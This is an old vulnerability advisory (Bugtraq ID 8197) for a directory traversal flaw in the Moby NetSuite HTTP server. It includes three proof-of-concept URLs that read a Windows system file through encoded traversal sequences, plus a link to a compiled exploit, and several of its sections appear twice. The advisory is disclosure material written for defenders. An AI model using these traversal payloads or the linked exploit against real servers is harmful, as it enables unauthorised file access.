NetSuite HTTP Server Directory Traversal Vulnerability
BID:8197
Info
NetSuite HTTP Server Directory Traversal Vulnerability
| Bugtraq ID: | 8197 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Jul 15 2003 12:00AM |
| Updated: | Jul 15 2003 12:00AM |
| Credit: | Discovery of this vulnerability has been credited to [email protected]. |
| Vulnerable: |
Mobydisk Moby Netsuite 1.2 Mobydisk Moby Netsuite 1.0 |
| Not Vulnerable: | |
Discussion
NetSuite HTTP Server Directory Traversal Vulnerability
The HTTP component of NetSuite has been reported prone to a directory traversal vulnerability.
Various combinations of encoded directory traversal sequences may be used to break out of the web root directory. Attackers may gain access to files that are readable by the web server as a result.
The HTTP component of NetSuite has been reported prone to a directory traversal vulnerability.
Various combinations of encoded directory traversal sequences may be used to break out of the web root directory. Attackers may gain access to files that are readable by the web server as a result.
Exploit / POC
NetSuite HTTP Server Directory Traversal Vulnerability
The following proof of concept has been provided:
http://www.example.com/%5c..%5c..%5c..%5cwindows%5cwin.ini
http://www.example.com/%5c..%5c..%5c..%5cwindows%5cwin%2eini
http://www.example.com/\..\..\..\windows\win.ini
A compiled exploit can be downloaded at:
http://members.lycos.co.uk/r34ct/main/Netsuite_expl/
The following proof of concept has been provided:
http://www.example.com/%5c..%5c..%5c..%5cwindows%5cwin.ini
http://www.example.com/%5c..%5c..%5c..%5cwindows%5cwin%2eini
http://www.example.com/\..\..\..\windows\win.ini
A compiled exploit can be downloaded at:
http://members.lycos.co.uk/r34ct/main/Netsuite_expl/
Solution / Fix
NetSuite HTTP Server Directory Traversal Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
NetSuite HTTP Server Directory Traversal Vulnerability
References:
References:
- Moby's Netsuite 1.21 vulnerabilities.txt (dr_insane)